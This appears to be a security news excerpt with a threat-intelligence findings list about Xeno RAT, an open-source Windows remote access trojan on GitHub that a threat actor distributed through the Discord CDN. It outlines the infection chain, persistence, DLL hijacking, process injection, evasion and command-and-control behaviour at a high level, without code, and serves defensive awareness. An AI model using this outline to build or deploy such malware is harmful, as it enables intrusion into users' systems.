An “intricately designed” remote access trojan (RAT) called Xeno RAT has been made available on GitHub, making it available to other actors at no extra cost. Written in C# and compatible with Windows 10 and Windows 11 operating systems, the open-source RAT comes with a “comprehensive set of features for remote system management,” according to its developer, who goes by the name moom825 Read More
The Hacker News
KEY FINDINGS
- Xeno RAT possesses sophisticated functionalities and characteristics of advanced malware.
- The malware’s developer opted to maintain it as an open-source project and made it accessible via GitHub.
- A threat actor customized its settings and disseminated it via the Discord CDN.
- The primary vector in the form of a shortcut file, disguised as a WhatsApp screenshot, acts as downloader.
- The downloader downloads the zip archive from Discord CDN, extracts and executes the next stage payload.
- A multi-step process is employed to generate the ultimate payload of the malware.
- It looks for the debuggers, monitoring, and analysis tools before executing the final stage.
- Utilizes anti-debugging techniques and follows a stealth operation process.
- Malware adds itself as scheduled task for persistence.
- Leverages the DLL search order functionality in Windows to load the malicious DLL into a trusted executable process.
- Injects the malicious code (process injection) in the legit windows process.
- Performs continuous monitoring of the compromised systems.
- Employes extensive obfuscation techniques within files/code to evade detection effectively.
- Uses obfuscated network traffic to receive instructions and updates.
- Communicates with C2 with status updates and receives instructions at regular intervals.